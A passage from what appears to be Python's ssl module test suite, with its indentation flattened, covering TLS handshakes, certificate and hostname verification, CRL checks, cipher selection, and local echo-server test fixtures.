# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
